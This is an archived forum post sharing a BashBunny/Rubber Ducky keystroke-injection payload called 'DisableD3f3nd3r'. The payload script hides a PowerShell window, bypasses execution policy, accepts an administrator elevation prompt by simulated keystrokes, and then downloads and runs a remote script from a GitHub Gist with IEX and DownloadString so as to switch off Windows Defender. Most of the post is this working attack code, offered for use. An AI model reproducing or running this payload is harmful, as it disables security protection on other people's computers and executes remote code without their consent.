Jump to content

[PAYLOAD] DisableD3f3nd3r


InfoSecREDD

Recommended Posts

Posted

DisableD3f3nd3r

This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". 

Source Code of the Powershell Script:
https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc

The Payload:
 

#!/bin/bash
#
# Title:         Disable D3f3nd3r (BashBunny)
# Description:   This Payload disables Windows Defender using Powershell, Works also for the Hak5
#                Rubber Ducky or any HID device that supports Quacking.
# Author:        REDD of Private-Locker
# Version:       1.0
# Category:      Disable Security
# Target:        Windows
#
# Source:        https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1
#


LED SETUP
ATTACKMODE HID

LED ATTACK
RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\""
Q LEFTARROW;
Q ENTER;
Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\""
Q ENTER;
sleep 1;
Q STRING "exit";
Q ENTER;

LED FINISH


 

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...